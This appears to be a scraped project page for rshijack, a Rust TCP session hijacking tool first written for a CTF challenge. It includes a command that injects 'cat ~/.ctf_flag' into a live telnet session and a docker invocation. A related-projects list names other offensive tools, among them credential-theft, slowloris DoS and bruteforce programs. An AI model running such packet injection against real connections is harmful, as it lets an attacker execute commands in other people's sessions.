tcp connection hijacker, rust rewrite of shijack

Overview

rshijack Build Status Crates.io

tcp connection hijacker, rust rewrite of shijack from 2001.

This was written for TAMUctf 2018, brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated, there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done, then inject a tcp packet into the telnet connection:

# if you don't know one of the ports use 0 to match any port
echo 'cat ~/.ctf_flag' | sudo rshijack tap0 172.16.13.20:37386 172.16.13.19:23

After some attempts this command was accepted and executed by the telnet server, resulting in a tcp packet containing the flag.

screenshot

The way this works is by sniffing for a packet of a specific connection, then read the SEQ and ACK fields. Using that information, it's possible to send a packet on a raw socket that is accepted by the remote server as valid.

The other tools in that screenshot are sniffglue and arpspoof.

Docker

If needed, rshijack can be pulled as a docker image. The image is currently about 10.2MB.

docker run -it --init --rm --net=host kpcyrd/rshijack eth0 172.16.13.20:37386 172.16.13.19:23

Notable mentions

License

GPLv3+

You might also like...
Rust library for building and running BPF/eBPF modules

RedBPF A Rust eBPF toolchain. Overview The redbpf project is a collection of tools and libraries to build eBPF programs using Rust. It includes: redbp

Rust library for developing safe canisters.

IC Kit This library provides an alternative to ic-cdk that can help developers write canisters and unit test them in their Rust code. Install Add this

MimiRust - Hacking the Windows operating system to hand us the keys to the kingdom with Rust.
MimiRust - Hacking the Windows operating system to hand us the keys to the kingdom with Rust.

MimiRust - Hacking the Windows operating system to hand us the keys to the kingdom with Rust. MimiRust is a program based on the wdigest attack vector

simple multi-threaded port scanner written in rust
simple multi-threaded port scanner written in rust

knockson simple multi-threaded port scanner written in rust Install Using AUR https://aur.archlinux.org/packages/knockson-bin/ yay -Syu knockson-bin M

Rust TLS/SSL certificate expiration date from command-line checker

Rust TLS/SSL certificate expiration date from command-line checker

Lightweight slowloris (HTTP DoS) implementation in Rust.
Lightweight slowloris (HTTP DoS) implementation in Rust.

slowlorust Lightweight slowloris (HTTP DoS) implementation in Rust. Slowloris is a denial-of-service attack program which allows an attacker to overwh

A simple port scanner built using rust-lang

A simple port scanner built using rust-lang

Safe Rust interface to the Vulkan API.

Magma: A strictly typed Vulkan API interface. Magma is a strictly typed Rust interface for the vulkan API. This means that whenever possible, the well

A rust program to bruteforce ZIP, PDF and some popular hashes.

Veldora A program to bruteforce zips, pdfs and some popular hashes. This is basically a rust version of bruttle, but a lot faster. Installation: git c

Comments
  • Pipe hijacked connection to stdout

    Pipe hijacked connection to stdout

    You currently need to sniff for replies manually, having rshijack sniff for replies and print them to stdout would be a major improvement.

    rshijack should feel like nc after the connection has been hijacked.

    To improve this further, we should consider sending ACK packets to keep the connection alive.

    enhancement help wanted good first issue 
    opened by kpcyrd 0
  • Port wildcards

    Port wildcards

    Especially during development it was somewhat cumbersome to edit the src port for each connection, it might make sense to have some sort of wildcard syntax to match any connection to a specific service, but I'm not sure what's the best way to express this.

    opened by kpcyrd 0
  • Consider removing pcap dependency

    Consider removing pcap dependency

    We currently depend on libpcap-dev to sniff seq/ack. It would be interesting to evaluate if it could be replaced with libpnet, which is already used in this project to send raw packets.

    help wanted good first issue 
    opened by kpcyrd 0
  • Some improvements

    Some improvements

    • The desync protection from the original shijack implementation has been added with -0
    • Sending a single packet was sufficient to solve the CTF level, this has been improved by reading data in a loop, with some log lines from the original implementation
    • After EOF, a FIN packet is sent to the remote peer
    opened by kpcyrd 0
Releases(v0.4.0)
Owner
Independent security research. Works on backdoor-resistant software distribution. Maintains packages in Arch Linux and Debian. Steals food at conferences.
null
A rewrite of my first Password generator in rust.

PGen-Rust Getting Started You can get the latest version of PGen from the github actions artifacts or from one of these links: linux, windows, macos U

Racci 4 Jun 1, 2022
Detects usage of unsafe Rust in a Rust crate and its dependencies.

cargo-geiger ☢️ Looking for maintainer: https://github.com/rust-secure-code/cargo-geiger/issues/210 A program that lists statistics related to the usa

Rust Secure Code Working Group 1.1k Jan 4, 2023
An esoteric language/compiler written with Rust and Rust LLVM bindings

MeidoLang (メイドラング) A not so useful and esoteric language. The goal of this project was to contain some quirky or novel syntax in a stack-style program

null 0 Dec 24, 2021
Rust-verification-tools - RVT is a collection of tools/libraries to support both static and dynamic verification of Rust programs.

Rust verification tools This is a collection of tools/libraries to support both static and dynamic verification of Rust programs. We see static verifi

null 253 Dec 31, 2022
Rust bindings for libinjection

libinjection-rs Rust bindings for libinjection. How to use Add libinjection to dependencies of Cargo.toml: libinjection = "0.2" Import crate: extern c

ArvanCloud 35 Sep 24, 2022
A simple password manager written in Rust

ripasso A simple password manager written in Rust. The root crate ripasso is a library for accessing and decrypting passwords stored in pass format (G

Joakim Lundborg 548 Dec 26, 2022
A fast, simple, recursive content discovery tool written in Rust.

A simple, fast, recursive content discovery tool written in Rust ?? Releases ✨ Example Usage ✨ Contributing ✨ Documentation ?? ?? What the heck is a f

epi 3.6k Dec 30, 2022
link is a command and control framework written in rust

link link is a command and control framework written in rust. Currently in alpha. Table of Contents Introduction Features Feedback Build Process Ackno

null 427 Dec 24, 2022
CVEs for the Rust standard library

Rust CVE Preface This is a list of CVEs for unsound APIs in the Rust standard library. These bugs break Rust's memory safety guarantee and lead to sec

Yechan Bae 26 Dec 4, 2022
Rust bindings for VirusTotal/Yara

yara-rust Bindings for the Yara library from VirusTotal. More documentation can be found on the Yara's documentation. Example The implementation is in

null 43 Dec 17, 2022